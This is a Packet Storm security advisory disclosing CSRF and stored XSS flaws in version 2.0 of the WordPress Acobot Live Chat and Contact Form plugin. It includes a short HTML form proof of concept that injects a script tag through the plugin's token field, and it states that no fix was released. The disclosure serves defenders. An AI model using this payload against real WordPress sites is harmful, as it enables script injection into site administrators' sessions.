exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Acobot Live Chat And Contact Form 2.0 CSRF / XSS

WordPress Acobot Live Chat And Contact Form 2.0 CSRF / XSS
Posted Feb 9, 2015
Authored by Morten Nortoft, Kenneth Jepsen, Mikkel Vej

WordPress Acobot Live Chat and Contact Form plugin version 2.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | bdfc48dbd7f56bb4624b57c256326b0ae156e1a91cb1158d5afbfaee526866fd

WordPress Acobot Live Chat And Contact Form 2.0 CSRF / XSS

Change Mirror Download
Title: WordPress 'Acobot Live Chat & Contact Form' CSRF/XSS
Version: 2.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/acobot/
Contacted WordPress: 2015/01/26
==========================================================

## Plugin description:
==========================================================
Enhance your WordPress with a virtual robot in 3 minutes or less and boost your sales like never before. It's simple, easy and fast.

## CSRF:
==========================================================
It is possible to change plugin settings by tricking a logged in admin to visit a crafted page.


## Stored XSS:
==========================================================
The installation key in the admin panel is stored and displayed unsanitized. This allows an attacker to perform XSS through that field.

PoC:
Log in as admin and submit the this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=acobot&update_account=something">
<input type="text" name="acobot_token" value=""/><script>alert(1)</script>"><br />
<input type="hidden" name="acobot_code_script" value=""><br />
<input type="submit">
</form>


## Solution
==========================================================
No fix has been released.
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    32 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close